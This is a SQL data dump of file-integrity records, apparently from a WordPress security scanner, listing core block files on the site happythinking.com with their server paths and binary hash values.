('Ì/¦}‘¡Â¦•ÆkA¸Zj', 'wp-includes/blocks/query-pagination/editor-rtl.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/query-pagination/editor-rtl.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'í~ªuò‘½à‘âîdNæ', '÷$ç¯Ô¡i¥ãÇxr:`•k™G±r«?ù™‚Õ‰¤é', '', 0, '?'),
('S?¯dìxS“•àÙŽ@', 'wp-includes/blocks/query-pagination/editor.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/query-pagination/editor.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'A˜ÒLòâæ4ÊvKöpA\\½', 'UÏµÝÚRxvqÍ§æÚö%Î‰zÐu*¥¾è«öl', '', 0, '?'),
('I\r8p:Í	Þž}`‹\Zã', 'wp-includes/blocks/query-pagination/editor.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/query-pagination/editor.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '­¡éc&ÖÊG¨Quêp', '¡èÌ3ÇÙù?’/,([+\nê˜ÛR»Ò*2Ï/û$®É}', '', 0, '?'),
('ÝÛ0ƒàªï±\Z/1¢Ò~', 'wp-includes/blocks/query-pagination/style-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/query-pagination/style-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'µHÈž]y¢d`R<', '›Ï­FÅà‚K±^®á	BíÒ¯ÅBn‚5“Ý', '', 0, '?'),
('»¾˜ìíLðû\Z¼Å', 'wp-includes/blocks/query-pagination/style-rtl.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/query-pagination/style-rtl.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ð.¿Œ+»ÌþZ\\b^ù', 'aâ:”]õR±¤å™3ü°?-öåowÜ©,Æ®c¦ur', '', 0, '?'),
('†ìƒ@ø¤''½y¦¸ÞqÖ', 'wp-includes/blocks/query-pagination/style.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/query-pagination/style.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'èëz~ø“N’¬êYÇˆ', 'aýŠW‡ru´áèÞð.©	yË÷''a3|&ðÐ§', '', 0, '?'),
('Û4Vús#À,ïûQøî', 'wp-includes/blocks/query-pagination/style.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/query-pagination/style.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Þ(ÿðƒyXÉön	îHÝf„', 'DAòuJ[ù˜¢?Wå¸–ÎÑ.Ùë±oIáoè¸&', '', 0, '?'),
('ÇW}\rDÅ¬½w‹°*¾ñ', 'wp-includes/blocks/query-pagination-next/block.json', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/query-pagination-next/block.json', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'À|p$.¤ÁNWî»å¼ôJ', 'Â¢JCÍŠàá\\t2¼ã®(á1Ò$YùSVhÀ8', '', 0, '?'),
('_ûŽ2oø±ÀU¶§úE6', 'wp-includes/blocks/query-pagination-next.php', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/query-pagination-next.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '†ðT«ÍlcÄÊÝ}k`bzr', 'ú´âké$ÓÉùû‘Ä\\˜9ëOR×¬Ã½ÐŒoÿ|Y#È', '', 0, '?'),
('«éuôgk²DÁ—E‡‰K', 'wp-includes/blocks/query-pagination-numbers/block.json', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/query-pagination-numbers/block.json', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', ';D}WRqÿ>ù]ò»Â$', 'æxàÛ=f\0_¹óðŠÁ€‰êŠ”\Z“mL¾qöbJ…', '', 0, '?'),
('Nsfº#†@Q;§;¾{Ì»', 'wp-includes/blocks/query-pagination-numbers/editor-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/query-pagination-numbers/editor-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'P,ÏÇ#0OÜ%ò<ü8£|', 'qnðiê÷È…å\nÒûÑ„o3QÛ¾-NP3NH', '', 0, '?'),
(' •yÁ>4œl»°gRÓ', 'wp-includes/blocks/query-pagination-numbers/editor-rtl.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/query-pagination-numbers/editor-rtl.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '‰¶gÄZá† 8¬Zœ', 'ËÐy¸ ¾qÞÑk»óÒj°¯»|æ¼gY{Š‘Ì', '', 0, '?'),
('‚Ñ{Œõh§ŽæB-o:IhÅ', 'wp-includes/blocks/query-pagination-numbers/editor.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/query-pagination-numbers/editor.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Í@Eé(1þË±ûe„¨Bô', 'O;\nV¡[%ñ\Z3°ü•³Ehßdßxø:Ò{®', '', 0, '?'),
('D	( ,|¹ŽÀµb?ïL', 'wp-includes/blocks/query-pagination-numbers/editor.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/query-pagination-numbers/editor.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'e‰Ö*•˜ôlµ:ÀÕ\\w', '£êw9±Cï1Õ''Þ$å”IN+¹¡3Úºè¾$ƒs', '', 0, '?'),
('\0›,¾#µheLGº(}', 'wp-includes/blocks/query-pagination-numbers.php', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/query-pagination-numbers.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'VªºDœiñFB2ÿ\nu6B', '·T:ö¢\0h¡»¯Y>c2^xÛ\r‚´¯:=þä>', '', 0, '?'),
('z2]w''´á="Ó-£4', 'wp-includes/blocks/query-pagination-previous/block.json', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/query-pagination-previous/block.json', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ùìÁ?(íf=‰GWrvê…û', '1	\ZNT9ZÉ¯g0£&€/\r¦3\nmƒDVÇ¯<”­Ø\\', '', 0, '?'),
('Vi''×ãRuËh:þÀ³uÕ', 'wp-includes/blocks/query-pagination-previous.php', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/query-pagination-previous.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'K •P2Sˆç“#E', ']÷ejAÎYâÐá•1Ò²Ç:U›3—÷Á!m×\\', '', 0, '?'),
('9¶ þ{b\nJcÑF=lY', 'wp-includes/blocks/query-pagination.php', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/query-pagination.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'båýÕÙÐ5`¿	M3a5þõ', 'TU-n%I®Ÿe»ÔiC7ô„«J®²Ì}¿	>¢', '', 0, '?'),
('yæ3¡Ýâ2/Ÿ¤[X#ùÂF', 'wp-includes/blocks/query-title/block.json', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/query-title/block.json', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '"ý—.úS@;G¾g±x6¶', 'J€Š\Z6\ZC†}RŽZ!ì\Zw5(=Ó=YSmxuF', '', 0, '?'),
('Ý²¼©gË>:Å[tQ¯V', 'wp-includes/blocks/query-title/style-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/query-title/style-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '9Š-m†Cl-ÿâ¿h', 'ÐiÉ)!nÒle#ÕÔüäaniqÊla\nÑOÿX', '', 0, '?'),
('`\0Wû›’çLëÀ„ˆHï&', 'wp-includes/blocks/query-title/style-rtl.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/query-title/style-rtl.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', ']ÜlüÂ¥Ë€äÍÜí3', 'd"QäÙ¥[ÉRf?Ð°-[1“õ±•#x¾r,md\r_', '', 0, '?'),
('¢HÿY/Ÿ­,FŠ¦v½', 'wp-includes/blocks/query-title/style.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/query-title/style.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '9Š-m†Cl-ÿâ¿h', 'ÐiÉ)!nÒle#ÕÔüäaniqÊla\nÑOÿX', '', 0, '?'),
('«#¥\nÒÏÔÉ°Àé®Ð‚¥', 'wp-includes/blocks/query-title/style.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/query-title/style.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', ']ÜlüÂ¥Ë€äÍÜí3', 'd"QäÙ¥[ÉRf?Ð°-[1“õ±•#x¾r,md\r_', '', 0, '?'),
('dá§à1TÊgˆbž¦€!', 'wp-includes/blocks/query-title.php', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/query-title.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '-b,µ¤Ðwð‹ãrË¡HÍ', 'êÝÙ–à~.ÊYwŒACå±$ä|\02€ˆ5â?É', '', 0, '?'),
('áTÂT²9Ü°ÊØ\njí~', 'wp-includes/blocks/query.php', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/query.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ýÝæ“<£›ïç–ÙËäc‡„', 'Õ¿›êÙ% ÚeŸ\0WðÙ¥10ÁÖ«µ;€¦¬qÙ;', '', 0, '?'),
('˜XöRÿevø• O¶ôU', 'wp-includes/blocks/quote/block.json', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/quote/block.json', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'j!³¾sïãÒ˜å\0Ú', '-ãwÌ_ü@Pöþ”%,­ì6Q€Ôr¾UÓ…³', '', 0, '?'),
('èSÙI’›ã#¸µ )|', 'wp-includes/blocks/quote/style-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/quote/style-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '\rÎ5_à~|cnþ¶	', '‡ŽãIÿ¹E6;¥Wô&>ž<\0Þc`%\nÌpjzkTu', '', 0, '?'),
('9œæ¯Ñy²SöÀ	pV6=', 'wp-includes/blocks/quote/style-rtl.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/quote/style-rtl.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '1Unò›ò00àsÃÿÐCð', 'K[í|wbÄ8c5Ua?%Ë¾¶ìÅ¬áÉ2ft»', '', 0, '?'),
('Îä—ÏÿÉ®ª\nŒP', 'wp-includes/blocks/quote/style.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/quote/style.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', ')AÌ¿¯ðÊ<:ßì>N', '™í•Oã/â\n»Æ/G«"ïsÎ½RÈŒw„¼Ýe', '', 0, '?'),
('Òñlü¤I\r,B8ð¦º', 'wp-includes/blocks/quote/style.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/quote/style.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'F“mÜý/xÅ%±rka°', 'ˆ­YöˆSY¥OOc1têjxR´É¤T‰À©úBò', '', 0, '?'),
('½Gï¸ˆƒgÙíÝàÐpÎŠ', 'wp-includes/blocks/quote/theme-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/quote/theme-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ä±C#µÄŠóçJÃÆM', 'n‹t2ƒû(:¯h6|	,Â¦Ôé‘{ýUD\0I!/2', '', 0, '?'),
('¤¤í;¯dAo+¿á›d(ž', 'wp-includes/blocks/quote/theme-rtl.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/quote/theme-rtl.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Î·½òŒ=ÿùþ<å`…¿ý', 'OöKyëòsþ.SŠÚøÃ\rReAõÊd5NÔÇJ', '', 0, '?'),
('úƒ$*ß-ÌÙ‹ÆìÇ', 'wp-includes/blocks/quote/theme.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/quote/theme.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ó86â¢¢œû¹ì°íÑ', 'âÉÜ™¼bi@9ÞóÕ\\•ýÞKqL2Ï:µØ++', '', 0, '?'),
('Q“P5Z¸Î÷Öw÷NiaÂ', 'wp-includes/blocks/quote/theme.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/quote/theme.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '•EÆvÛb&ÉU‰ÝW{', '$óùÕÇ0	8s;à_	I,Ïu[ž\\‹µNäƒ­', '', 0, '?'),
('+»ÞHj~™”ìÁš¡ñ', 'wp-includes/blocks/read-more/block.json', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/read-more/block.json', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '$ø\\Ë\nºµu"ïÇÊµ\\¶t', '¼ÎBÄó)óüªN¡Ó‘4éòT	>4$9ôäm+ƒ', '', 0, '?'),
('ÕüJœ?½,À‰¦ÛQî6”', 'wp-includes/blocks/read-more/style-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/read-more/style-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'à›é‡ÍOöW¾’F[Gk4', 'H9	øv\n¢Ü­û²Ù÷ ŸB¥ 5\ršû`>áu¥e', '', 0, '?'),
('M»þPz«QóApÐ"ûM+', 'wp-includes/blocks/read-more/style-rtl.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/read-more/style-rtl.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'À°¡+¾`¢¨ûA¯š0', 'O;¨/l:úÂkW€ÂPë(æøQ.Ú¾ëÑ?q¿û)', '', 0, '?'),
('óŒé¹ÈÄ^@¦é9§ÊÎ', 'wp-includes/blocks/read-more/style.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/read-more/style.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'à›é‡ÍOöW¾’F[Gk4', 'H9	øv\n¢Ü­û²Ù÷ ŸB¥ 5\ršû`>áu¥e', '', 0, '?'),
(')ž7{\r);2iÛÒ+²ÌÞ', 'wp-includes/blocks/read-more/style.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/read-more/style.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'À°¡+¾`¢¨ûA¯š0', 'O;¨/l:úÂkW€ÂPë(æøQ.Ú¾ëÑ?q¿û)', '', 0, '?'),
('%	ÿýâÅ¿“kuXëbªŸ³', 'wp-includes/blocks/read-more.php', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/read-more.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'zoÉE–ˆuUvÚÙ2½T', '‰¡1+ñVöÆX®yo²Û&Õð¢ÀÓBaLêÝ', '', 0, '?'),
('°ÊpBr‘Ì\0ÛU	BËRå', 'wp-includes/blocks/require-dynamic-blocks.php', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/require-dynamic-blocks.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '§¥³>!uG£\n©<bÎ¾·', ':¡à¦}\rÊ‚}w¸MCF–ý§34oç1ûÎyñ!V=/', '', 0, '?'),
(' ‰¶=ä¾á«i;[ž', 'wp-includes/blocks/require-static-blocks.php', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/require-static-blocks.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ö¦ŒIƒ„Œì«4\rDŸ©', 'þ\Z|xb1);†ëòß\\Ãµ,½>²=è)nOö¡Êçt‹', '', 0, '?'),
('±gÚbf\r\ZÿîÑŠæÿ', 'wp-includes/blocks/rss/block.json', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/rss/block.json', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '	_u›Ï:µ|ÒÁËÿW./', '-ò\noæ|‰z¯Ì#_ÜÑú0—]\\Çu•-Rèbà?', '', 0, '?'),
('‰˜»ƒõnJ-2 ªœ5WÂ', 'wp-includes/blocks/rss/editor-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/rss/editor-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '×¯Ä‡»§¶–Èóuþˆ¬', '!	ƒL(¯òL''=	öŸ†Þ“\r¤gÉÈ€jœ=Ýtè', '', 0, '?'),
('…¦í¼ýI6­«ÔFñ', 'wp-includes/blocks/rss/editor-rtl.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/rss/editor-rtl.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '7b¥l''ü¯ÃUÞn¨u	Ï¦', '‡íJT(1>Ê5ªlíìr­Ÿq“ÅÞõLÌ\\{ØÿÉÛ', '', 0, '?'),
('(l«ÃÖ…+%ñm»‡ØGI@', 'wp-includes/blocks/rss/editor.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/rss/editor.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '×¯Ä‡»§¶–Èóuþˆ¬', '!	ƒL(¯òL''=	öŸ†Þ“\r¤gÉÈ€jœ=Ýtè', '', 0, '?'),
('¥´P‘â”Z2™7ÇMn¯', 'wp-includes/blocks/rss/editor.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/rss/editor.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '7b¥l''ü¯ÃUÞn¨u	Ï¦', '‡íJT(1>Ê5ªlíìr­Ÿq“ÅÞõLÌ\\{ØÿÉÛ', '', 0, '?'),
('§ü­…ŽÎ8«j‡þc}‹', 'wp-includes/blocks/rss/style-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/rss/style-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Å$Tn…øþ9Æš÷•†™', '§ÞƒŽ¶`2Ì²ßâÄÈ&€ÿA+äe§‰	FóÂ¸', '', 0, '?'),
('54ÜÆÁZâ£Ê—ƒHJ', 'wp-includes/blocks/rss/style-rtl.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/rss/style-rtl.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'i <ækÐª”ÝÆë5]ÿW', '|>‰	õ#ê"\\ðW+pêÍ²Ý‡ýØ€Ú§¶º1Êy¨', '', 0, '?'),
('=ž	„®\\vV£«‰­Çx', 'wp-includes/blocks/rss/style.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/rss/style.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ü+þc{ê<|	ÆÑÃÇ', '6.bE8F;‰Ò]–‹8 Kr›Ë¶—ÓŸì·ŠŽ\\', '', 0, '?'),
('	eõØ­VòÀMëìÀyž', 'wp-includes/blocks/rss/style.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/rss/style.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'V¡÷»«[¦Ñ1ÏiæŠù', 'OªOþ«ûr''(\r¢M2J7¶ž²Öõ¯Ã`üÙ‹=àh´', '', 0, '?'),
('4›ŽBÖ\07qoBÇo6í', 'wp-includes/blocks/rss.php', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/rss.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÚÜ´·%q…Ãw;ü#oGß', 'P¥d$Ð^ð’Ñ¿8‡=•ý-r‰A/hžZ±J', '', 0, '?'),
('ÉX|_ÕÈwcÓ:©j‚ÑÀ', 'wp-includes/blocks/search/block.json', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/search/block.json', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '{.±7ä@:A¿ÎÒWç¨=', 'Ý\nÉ$£À !x•>nM¤tX_¨¹°Ú¥"Òm', '', 0, '?'),
('´þê‘‰}úOaŸT‡TN.', 'wp-includes/blocks/search/editor-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/search/editor-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ã=™\\&àÏÚ¢1]GZW', 'áT•ëU˜f1›ÄdÞ»÷õjQ;¦Yôå"3˜ºM\Zr', '', 0, '?'),
('Éï—¾ß«h&£''s', 'wp-includes/blocks/search/editor-rtl.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/search/editor-rtl.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'p›†W\nõç˜Ó‡Üñ', 'ª·ÇEö¿*Ëi´ô	Å³ºÄÆhÙ1¸èN©K[«', '', 0, '?'),
('¾¦M3ÖvaBcdµ', 'wp-includes/blocks/search/editor.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/search/editor.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ã=™\\&àÏÚ¢1]GZW', 'áT•ëU˜f1›ÄdÞ»÷õjQ;¦Yôå"3˜ºM\Zr', '', 0, '?'),
('¶he¨Ê-¬BJ–ñª_vñ', 'wp-includes/blocks/search/editor.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/search/editor.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'p›†W\nõç˜Ó‡Üñ', 'ª·ÇEö¿*Ëi´ô	Å³ºÄÆhÙ1¸èN©K[«', '', 0, '?'),
('›m`«Ä5\n+Öã‘7Òñ', 'wp-includes/blocks/search/style-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/search/style-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ï¨ã}Þq¹eSEáÓ/ì†', 'ÓÞ™x•.ŒÄ.~âTMfÛ*¤9W#ŠõÊ®0', '', 0, '?'),
('C­ms\nÃáXø]ÀÅK’T', 'wp-includes/blocks/search/style-rtl.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/search/style-rtl.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '–&i2>ê»\n\\¿\r{d', 'Q[&œQì¢•`Âòó>ƒ	èpáXöG§¦r2Iƒ', '', 0, '?'),
('saO¸Yˆ,~ràµ­kÃ', 'wp-includes/blocks/search/style.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/search/style.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'è>&dl`€ÛC [', 'W%½¸pÊtíXÁò1îÊ\rµúPu­\\ÖB¿æšÛ8j', '', 0, '?'),
('‰_ž ¥ˆ6T˜‘þNG?', 'wp-includes/blocks/search/style.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/search/style.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'G çPú!.ìP”+', 'lv¢»lÊMS!ëØr¹Ó\0As3U¯û¡÷d^0~Žß', '', 0, '?'),
(',Rµ3Z9—iÌGøî˜', 'wp-includes/blocks/search/theme-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/search/theme-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¾‡OÁ1f43´¡ÖÑ¼_0', '}+»‘{È–19ÇD\0W0‰S¹(\0š©sj(ª%%§p‚', '', 0, '?'),
('[Y[“»ój–¿ÇˆçGô', 'wp-includes/blocks/search/theme-rtl.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/search/theme-rtl.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ì¼zü©å˜»æ€S', 'ì-Nßk"”,[[Ñj¥_t -¨XÓOÖýèÞÃ', '', 0, '?'),
('ÄpÈ¬é“ES÷÷•ù0²K', 'wp-includes/blocks/search/theme.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/search/theme.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¾‡OÁ1f43´¡ÖÑ¼_0', '}+»‘{È–19ÇD\0W0‰S¹(\0š©sj(ª%%§p‚', '', 0, '?'),
('Ê	iôðìþª:g•y', 'wp-includes/blocks/search/theme.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/search/theme.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ì¼zü©å˜»æ€S', 'ì-Nßk"”,[[Ñj¥_t -¨XÓOÖýèÞÃ', '', 0, '?'),
('Zæ ¸A@¿ÖÆÒt“Š', 'wp-includes/blocks/search/view.asset.php', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/search/view.asset.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'FtÑ ò¯s–•Zƒ§âï€™', 'Òà‹Ätë™¢8žlÔ"ÃªK¹8@ÿN’1Œ˜gY#x', '', 0, '?'),
('ñT™ÞûÃ¨c\\Å¾xE\Z', 'wp-includes/blocks/search/view.js', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/search/view.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '\Z•TdÓç„•“Ôíä', 'º¡ù6›p¨d”ÉÜb<Ä.Q1qør‡®ì`ÚM¾ƒ*', '', 0, '?'),
('ÃÉN´™Æ:]€äyŽ\nÏ±', 'wp-includes/blocks/search/view.min.asset.php', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/search/view.min.asset.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'd¸:ŸQ‚âjòÙ', '6¾²Fn³[LÅ\0!Öm¢ÒØm9üÍÖm#¢kûÌ', '', 0, '?'),
('”&²¢¯OúZ=²Ds.Ó', 'wp-includes/blocks/search/view.min.js', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/search/view.min.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¹aÒº›ÿf†Ç„×vðÓÒë', 'ZšJÏµÓ-\\œ;{­ôÃ³Ò}?¼ïõ‡HøÁÙ', '', 0, '?'),
('â^}R	íV7{WI\rH', 'wp-includes/blocks/search.php', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/search.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'CëÀ© ÔÊrÀìp', 'rã×*KFôüvç3.[ôÓá>Êun’yúèÈß>}+aj', '', 0, '?'),
('L}b&‰Ûµå€b', 'wp-includes/blocks/separator/block.json', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/separator/block.json', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '1¯\0°àEïSþiÓA', 'ÐYîÑQ§’;ªf*šŽVÂ¬sˆ`ÿ” .ØwNzd', '', 0, '?'),
('î¾<„7vºÍY6?éàÑ', 'wp-includes/blocks/separator/editor-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/separator/editor-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'àéöR§4*vÙâÖ¶-ñ', 'Ú$î°ŠiÏä¾¢Ê\\¹úÉ\n½y.ÙQHt‹©\nÙq', '', 0, '?'),
('‹UÜÐzƒó®cžép¬©', 'wp-includes/blocks/separator/editor-rtl.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/separator/editor-rtl.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'éß—\nó}Cà1£w¦I–B4', 'ÃtéØäÁC¶Ëóže×BpLk\nkr¦áeK:I', '', 0, '?'),
('èò<|Æ†3#§`®}Š', 'wp-includes/blocks/separator/editor.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/separator/editor.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'àéöR§4*vÙâÖ¶-ñ', 'Ú$î°ŠiÏä¾¢Ê\\¹úÉ\n½y.ÙQHt‹©\nÙq', '', 0, '?'),
('¼5pÞªïm—\Zµˆîˆ„', 'wp-includes/blocks/separator/editor.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/separator/editor.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'éß—\nó}Cà1£w¦I–B4', 'ÃtéØäÁC¶Ëóže×BpLk\nkr¦áeK:I', '', 0, '?'),
('?åÌ®p|RÂoð¥é', 'wp-includes/blocks/separator/style-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/separator/style-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', ' ü——à…™`Á›^Á\r', '˜R»¬•hL‰ZèqGÍzh¸/^cøÔ*ÄCùõËê', '', 0, '?'),
